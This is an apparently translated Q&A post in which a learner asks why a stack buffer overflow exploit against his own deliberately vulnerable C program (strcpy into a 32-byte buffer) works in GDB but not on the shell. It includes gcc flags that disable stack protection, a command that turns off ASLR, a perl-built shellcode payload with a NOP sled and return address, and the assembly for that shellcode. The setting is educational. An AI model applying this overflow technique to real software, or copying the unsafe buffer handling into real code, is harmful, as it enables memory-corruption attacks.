没有GDB无法重现缓冲区溢出

我已经尝试解决此问题已有一段时间了。我已经检查了一些具有类似问题的StackOverflow链接，但是这些修复似乎都不对我有用。出于某种原因，我的漏洞利用代码没有像我应该遇到的“分段错误”（如果我的漏洞利用代码不起作用）那样，根本不会产生该错误。我最初的假设是perl代码以某种方式仅产生了一点输出，因此不会溢出到堆栈上，但是我通过将perl命令的输出传递到文件中证明了这是错误的。

但是，我无法在GDB中重现此问题。据我了解，GDB禁用了ASLR，但是我已经通过以下命令在系统中（暂时）禁用了ASLR。我知道此命令有效，因为我正在打印出变量＆buff的地址，并且在多次运行中都不会改变。

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

我还对可执行文件禁用了堆栈金丝雀保护：

gcc -g -m32 -fno-stack-protector -z execstack exploit.c

正如我之前所说，我的漏洞利用程序在GDB中运行完美。这是我的可利用程序，我将向您展示我的可利用代码。

漏洞利用

int checkFunc(char *c) {
    char buff[32];
    printf("0x%08x\n", &buff);
    strcpy(buff, c);
    if(strcmp(buff, "test") == 0) return 1;
    else return 0;
}

int main(int argc, char *argv[]) {
    int result = checkFunc(argv[1]);
    if(result == 1) printf("Access granted\n");
    else printf("Access denied\n");
    return 0;
}

GDB输出的[有效]漏洞利用代码

(gdb) set args "`perl -e 'print "\x90"x9 . "\x31\xD2\x31\xC9\x31\xDB\x52\x68\x70\x77\x6E\x0A\xB2\x04\x89\xE1\xB3\x01\xB0\x04\xCD\x80\xE9\xFB\xFF\xFF\xFF" . "\x30\xf6\xff\xbf"x5;'`"
(gdb) run
Starting program: /home/chris/exploit/a.out "`perl -e 'print "\x90"x9 . "\x31\xD2\x31\xC9\x31\xDB\x52\x68\x70\x77\x6E\x0A\xB2\x04\x89\xE1\xB3\x01\xB0\x04\xCD\x80\xE9\xFB\xFF\xFF\xFF" . "\x30\xf6\xff\xbf"x5;'`"
0xbffff630
pwn

定期输出漏洞利用代码

chris@cb:~/exploit$ ./a.out $(perl -e 'print "\x90"x9 . "\x31\xD2\x31\xC9\x31\xDB\x52\x68\x70\x77\x6E\x0A\xB2\x04\x89\xE1\xB3\x01\xB0\x04\xCD\x80\xE9\xFB\xFF\xFF\xFF" . "\x60\xf6\xff\xbf"x5;')
0xbffff660
Access denied

是的，我已经考虑到了返回地址的更改（GDB添加了额外的环境变量）。这就是为什么我会在程序中打印出返回地址而被欺骗的原因，以便我知道不使用GDB的确切值是什么。

如果有人认为漏洞利用代码某种程度上是错误的，那么我也将发布汇编代码。

xor    edx,edx   ;xor so we don't have to use a null terminator in our code
xor    ecx,ecx
xor    ebx,ebx
push   edx       ;push the null terminator to the stack
push   0xa6e7770 ;push our string pwn\n to the stack
mov    dl,0x4 
mov    ecx,esp
mov    bl,0x1
mov    al,0x4
int    0x80      ;print our string
jmp    eip - 1   ;keep on looping!

提前非常感谢您！我已经坚持了几个小时了。就像你们知道的那样，我已经编写了这个可利用的程序来了解“黑客：利用的艺术”中的缓冲区溢出。